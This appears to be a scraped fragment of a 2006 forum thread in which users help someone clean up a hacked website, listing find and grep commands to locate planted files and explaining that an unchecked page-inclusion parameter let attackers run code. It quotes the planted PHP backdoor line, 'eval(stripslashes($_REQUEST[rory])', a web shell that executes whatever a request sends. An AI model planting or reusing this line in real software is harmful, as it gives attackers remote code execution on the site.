Subscribeeval(stripslashes($_REQUEST[rory])
Files:
find / -type f -name \*rory\*
Directories:
find / -type d -name \*rory\*
Files:
find / -type f | xargs grep rory
Recursive directories:
find / -type d | xargs grep -r rory
mydomain.com/index.php?page=somepage. Apparently, people tricksier than me were able to substitute something special for "somepage" that allowed them to execute their own code and load up their own pages to my site.You are not logged in, either login or create an account to post comments
grep -r rory *
posted by IshmaelGraves at 10:16 AM on February 28, 2006